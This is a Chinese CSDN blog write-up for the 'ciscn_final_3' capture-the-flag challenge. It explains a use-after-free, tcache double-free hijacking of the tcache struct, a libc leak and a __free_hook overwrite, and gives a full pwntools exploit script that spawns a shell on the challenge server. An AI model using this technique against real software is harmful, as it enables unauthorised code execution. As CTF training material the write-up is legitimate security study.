ciscn_final_3 writeup

最新推荐文章于 2021-03-10 16:02:57 发布
最新推荐文章于 2021-03-10 16:02:57 发布
阅读量306 收藏
点赞数
文章标签: 1024程序员节
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43921239/article/details/109252938
版权

基本情况

Arch:     amd64-64-little
RELRO:    Full RELRO
Stack:    Canary found
NX:       NX enabled
PIE:      PIE enabled

C++程序。只有两个功能,新建、释放堆块。数量上限为:24,大小限制为:0x78 。用列表维护,释放操作基于下标定位指针。

新建完成后会输出堆 fd 内存地址。

漏洞

free 没指令指针,造成 UAF :

unsigned __int64 my_free()
{
  __int64 v0; // rax
  unsigned int v2; // [rsp+4h] [rbp-Ch]
  unsigned __int64 v3; // [rsp+8h] [rbp-8h]

  v3 = __readfsqword(0x28u);
  v0 = std::operator<<<std::char_traits<char>>(&std::cout, "input the index");
  std::ostream::operator<<(v0, &std::endl<char,std::char_traits<char>>);
  std::istream::operator>>((__int64)&std::cin, (__int64)&v2);
  if ( v2 > 24 )
    exit(0);
  free((void *)chunk_ptr_list[v2]);             // UAF
  return __readfsqword(0x28u) ^ v3;
}

思路

刚刚做完[V&N2020 公开赛]easyTHeap利用 tcache 部分基本相同。这道题 chunk 数量上限挺高的,可以通过 free 7 个 chunk 占满空间,可以不需要劫持 tcache 结构体数量标志位。

  1. double free ,劫持 tcache bin 的 chunk0 fd 到 tcache struct 上
  2. 修改 struct 中数量标志位;修改 bin 链头的地址为 chunk0-0x10 ,后面修改 chunk0 size 为 unsorted bin 大小,用来泄露地址;多写几个链头为 chunk0 fd ,后面分配到 main_area 上输出地址
  3. 再次劫持 tcache struct ,改一个链头 free_hook

获取 chunk0 后面用来计算各个地址:

add(0,0x50,'a'*8)#0

p.recvuntil("gift :")
chunk0_addr = int(p.recv(14),16)
log.info("chunk0_addr:"+hex(chunk0_addr))
tcache_struct = chunk0_addr - 0x11e60

double free ,写 tcache bin 0x60 链表写入结构体地址;再次申请成功分配到结构体上,劫持结构体数量以及链头地址:

free(0)
free(0)
add(1,0x50,p64(tcache_struct))#0
add(2,0x50,p64(tcache_struct))#0
add(3,0x58,(b'a'*5+b'\x00').ljust(0x40,b'a')+p64(chunk0_addr)*2+p64(chunk0_addr-0x10))
  • 劫持链头要一个 chunk0_addr-0x10 用来修改 size ,另外一个 chunk0_addr 用来分配到 main_area 上泄露地址。
  • 那个 \x00 是 0x70 的位置,这里不覆盖用来再次 tcache bin doublue free 再次劫持结构体。

做 chunk0 释放到 unsorted bin 绕过,nextchunk inuse 位设置为 1 ,再申请一个防止与 topchunk 合并:

add(4,0x38,p64(0)+p64(0x101))#orw chunk0 size
add(5,0x40,'b'*8)# chunk0 free unsortbin 绕过检查 nextchunk inuse 检查,需要为1
add(6,0x40,'c'*8)# 同上
add(7,0x50,p64(0xdeadbeef))# 防止合并topchunk
free(0)
add(8,0x28,p64(0xdeadbeef))# chunk0
add(9,0x28,p64(chunk0_addr+0x150))# create on main_area

再次劫持 tcache 结构体将堆分配到 free_hook 上:

add(10,0x60,'a')
free(10)
free(10)
add(11,0x60,p64(tcache_struct))#10
add(12,0x60,p64(tcache_struct))#10
add(13,0x60,(b'a'*5+b'\x00').ljust(0x40,b'a')+p64(free_hook)*4)

EXP

#!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Author  : MrSkYe
# @Email   : skye231@foxmail.com
from pwn import *
context(log_level='debug',os='linux',arch='amd64',
	terminal=['tmux','sp','-h'])

# p = process("./ciscn_final_3")
elf = ELF("./ciscn_final_3")
# libc = ELF("/lib/x86_64-linux-gnu/libc.so.6")
p = remote("node3.buuoj.cn",27718)
libc = ELF("./libc.so.6")

def add(id,size,content):
	p.recvuntil("> ")
	p.sendline('1')
	p.recvuntil("index\n")
	p.sendline(str(id))
	p.recvuntil("size\n")
	p.sendline(str(size))
	p.recvuntil("thing\n")
	p.send(content)
def free(id):
	p.recvuntil("> ")
	p.sendline('2')
	p.recvuntil("index\n")
	p.sendline(str(id))

add(0,0x50,'a'*8)#0

p.recvuntil("gift :")
chunk0_addr = int(p.recv(14),16)
log.info("chunk0_addr:"+hex(chunk0_addr))
tcache_struct = chunk0_addr - 0x11e60

free(0)
free(0)
add(1,0x50,p64(tcache_struct))#0
add(2,0x50,p64(tcache_struct))#0
add(3,0x58,(b'a'*5+b'\x00').ljust(0x40,b'a')+p64(chunk0_addr)*2+p64(chunk0_addr-0x10))

add(4,0x38,p64(0)+p64(0x101))#orw chunk0 size
add(5,0x40,'b'*8)# chunk0 free unsortbin 绕过检查 nextchunk inuse 检查,需要为1
add(6,0x40,'c'*8)# 同上
add(7,0x50,p64(0xdeadbeef))# 防止合并topchunk

free(0)
add(8,0x28,p64(0xdeadbeef))# chunk0
add(9,0x28,p64(chunk0_addr+0x150))# create on main_area

p.recvuntil("gift :")
main_area = int(p.recv(14),16)
log.info("main_area:"+hex(main_area))
libc_base = main_area - 0x3ebca0
system = libc_base + libc.sym['system']
free_hook = libc_base + libc.sym['__free_hook']
log.info("system:"+hex(system))
# gdb.attach(p)
# 再次劫持tcache struct
add(10,0x60,'a')
free(10)
free(10)
add(11,0x60,p64(tcache_struct))#10
add(12,0x60,p64(tcache_struct))#10
add(13,0x60,(b'a'*5+b'\x00').ljust(0x40,b'a')+p64(free_hook)*4)

'''
0x4f2c5 execve("/bin/sh", rsp+0x40, environ)
constraints:
  rsp & 0xf == 0
  rcx == NULL

0x4f322 execve("/bin/sh", rsp+0x40, environ)
constraints:
  [rsp+0x40] == NULL

0x10a38c execve("/bin/sh", rsp+0x70, environ)
constraints:
  [rsp+0x70] == NULL
'''
# free_hook 写入 onegadget
onegadget = libc_base + 0x4f322#0x4f3c2
add(14,0x40,p64(onegadget))

free(10)

p.interactive()
SkYe231_
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
【pwn】 ciscn_2019_final_3
Nothing
12-18 1694
例行检查 保护全开,分析程序。 add函数 只能申请小于0x78大小的chunk,chunk数量不能超过24个,且题目给了申请到内存空间的地址。 free函数 free后指针没有置0,且libc是2.27的,存在tcache dup。唯一问题就在于如何得到libc的地址。泄露libc地址一般通过unsortbin,存在tcache的情况下,64位程序需要申请超过0x400大小chunk,fre...
ciscn_final_3
seaaseesa的博客
04-09 343
ciscn_final_3 程序给的glibc版本为2.27,存在tcache机制 首先检查一下程序的保护机制 然后,我们用IDA分析一下 Delete功能存在UAF漏洞 程序没有show的功能,但是add时,会显示堆的地址。 为了能够泄露出glibc地址,我们就要依靠这个add时打印的堆地址。我们只要让tcache bin和unsorted bin重合,那么就能通过申请,...
ciscn_2019_final_3
、moddemod
07-08 641
tcache机制的利用,通过unsorted泄露进而将堆空间开辟到libc中,写__free_hook拿到shell… exp from pwn import * context.log_level = 'debug' def pause_debug(): log.info(proc.pidof(p)) pause() def add(idx, size, content): p.sendlineafter('choice >', str(1)) p.sendl.
your_pwn ciscn 2019 第十二届全国大学生信息安全竞赛
04-22
pwn赛题之your_pwn ciscn 2019 第十二届全国大学生信息安全竞赛
[V&N2020 公开赛]easyTHeap + ciscn_2019_final_3 ——heap中tcache的一些简单利用方法
PLpa的博客
06-06 1073
在libc2.26之后的libc版本中加入了新的存储结构tcache,这使得我们利用堆的时候要特别注意libc版本。 对tcache不是很了解建议看看CTFWiKi 1.[V&N2020 公开赛]easyTHeap 保护全开,libc2.27版本,进入IDA 看到程序有增删改查的功能。 我们一个个来看: add: 我们可以看到add中不能写入数据。 edit: add中不能读入的数据由edit来读入。 show: 没什么特殊的,就是输出数据,这里我们可以用其来查看我们泄露的地址。 dele
ciscn_sshop:参赛所用的sshop平台
05-10
2018ciscn sshop 2018ciscn半决赛已经结束了,就把题目放出来好了 ...writeup 详细的 docker环境 环境都在deploy里面了,可以直接运行部署即可 总结 第一次出题也收获了蛮多,以前也没自己出过题目 而且这次走运
ReverseRSA_writeup_rsa_appprivatekey_解密_
09-29
在“writeup_rsa_appprivatekey”中,作者可能详细记录了整个解密过程,包括所采用的策略、遇到的挑战以及最终的解决方案。这样的WriteUp对于学习者来说极其宝贵,因为它不仅展示了理论知识,还提供了实际问题解决的...
ADS Writeup_ads_
10-03
"Advanced Data Structure Writeup" 提供了一个深入探讨这一领域的详细分析,涵盖了各种复杂的数据结构及其在实际问题解决中的应用。 **一、数组** 数组是最基础的数据结构,它提供了固定大小且连续的内存空间来...
writeup_knkl_
09-30
3. **代码实现**:可能包含了一些示例代码,展示了如何在实际项目中应用"knkl"技术。 4. **最佳实践**:可能会涵盖在开发、测试和部署"knkl"技术时的最佳实践和注意事项。 5. **案例研究**:如果是一个真实的项目...
Stats_531_Final
04-20
writeup.Rmd / writeup.html :此项目的内容 data/ : mumps.csv :我们从下载的数据集 mumps.R :建立SEIR模型并进行分析 资料说明 兴趣变量 多变的 描述 week 指标变量,以周为时间单位 cases 记录整体报告案例...
2020CISCN初赛-crypto-lfsr writeup
lnjoy
09-15 1296
第十三届全国大学生信息安全竞赛初赛,密码学的lfsr详解。 本题考查线性反馈移位寄存器。 初始状态,反馈函数,输出序列都已给出,已知n是100。 输出序列即题给的output.txt。 反馈函数是代码形式,我们需要经过分析后转化为表达式形式。 通过分析反馈函数可以发现,初始状态即是输出序列的前100位倒置。 lfsr源代码如下, def lfsr(state, mask): feedback = state & mask feed_bit = bin(feedback)[2:].co
[BUUOJ] ciscn_2019_n_3
Joaus的博客
10-06 1785
这里写自定义目录标题漏洞点漏洞利用exp 漏洞点 可以看到主要就是在free的时候没有将相应的数组里的置0,可以导致UAF的漏洞: 漏洞利用 由于本题将printf和free函数的指针都放在了申请的堆上,而且程序调用了system函数因此我们就不用泄露libc基址了,我们的目标就是取得对存放指针的堆块的控制。 我们可以利用fastbin的LIFO的机制,取得对存放指针的堆块的控制,修改free指...
[BUUCTF]PWN——ciscn_2019_final_2
mcmuyanga的博客
03-10 1111
ciscn_2019_final_2 附件 步骤 例行检查,64位程序,保护全开 本地没有flag文件,远程连接一下,经典的堆题的菜单 64位ida载入 init() allocate(),只可以申请0x20或者0x10的chunk delete() show(),show只能调用3次 bye_bye 这道题的关键点在于文件流的知识 dup2 用来复制文件描述符:int dup2 (int oldfd,int newfd) _fileno 是用来规定 fd 所指向的文件流的,i
2020 第三届江西省高校网络安全技能大赛 线上赛Writeup
末初的CSDN博客
08-29 6087
第三届江西省高校网络安全技能大赛 线上赛Writeup
warmup [XCTF-PWN][高手进阶区]CTF writeup攻防世界题解系列14
重新启程
12-23 1815
题目地址:warmup 这是高手进阶区的第三题,我们先看下题目内容 这个题目没有附件,那就是要fuzz的题目了,我们先正常走一下程序看看 root@mypwn:/ctf/work/python/warmup# nc 111.198.29.45 32453 -Warm Up- WOW:0x40060d >AAA 这个题目的出发点就是要大家做fuzz,看下提示内容有个地址0x40060...
2018年全国大学生信息安全竞赛 CISCN Writeup
热门推荐
aptx4869_li的博客
06-07 1万+
逆向:RE:题目文件:链接:点击打开链接 密码:hyzy这题当时做的时候陷入了出题人的陷阱,上来找到了“关键部分”就开始逆,但是遇到了很多问题,因为有很多函数,而且篇幅都不小,而且每个函数还要调用其他一大堆函数,这就大大增加了工作量,后面实在看不下去了,就放弃了。后面找到一些大佬的writeup看了看,原来是思路的问题:总结一下:逆向赛题一般工作量不会大到让你逆不了,一下锁定了十七八个函数肯定是有...
第三届河北省大学生网络与信息安全选拔赛-Crypto-WP
luoluopeach
10-18 949
math [一血] 题目: from Crypto.Util.number import * from hashlib import md5 flag = "XXX" assert len(flag) == 14 pad = bytes_to_long(md5(flag).digest()) hack = 0 for char in flag: hack+= pad hack*= ord(char) print hack #hack = 6436448535706043484886570840
writeup-DASCTF2020七月赛crypto第一题bullshit
07-25 1204
bullshit 题目如下: from flag import flag def pairing(a,b): shell = max(a, b) step = min(a, b) if step == b: flag = 0 else: flag = 1 return shell ** 2 + step * 2 + flag def encrypt(message): res = '' for i in ra...
MoeCTF2020部分wp
kkzzjx
10-19 898
MoeCTF2020 PS.这里并不全且仅供参考 文章目录MoeCTF2020WEBEZmathMoe unserialize三心二意EzMath2misc不会吧 就这base64?两只企鹅Classic Crypto大帝的征程#1特定恺撒密码名称大帝的征程#2外面的世界大帝的征程#3大帝的征程#维吉尼亚Cryptoeasycrypto WEB EZmath import requests import re url='http://39.98.86.109:10001/' s=requests.Sessi
php upload ctf,强网杯CTF防御赛ez_upload Writeup
最新发布
05-14
首先,我们需要分析题目所提供的代码: ... error_reporting(0); if ($_FILES["upload"]["error"] > 0) { echo "Error: " . $_FILES["upload"]["error"] .... echo "Upload: " .... echo "Type: " .... echo "Size: " ....
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值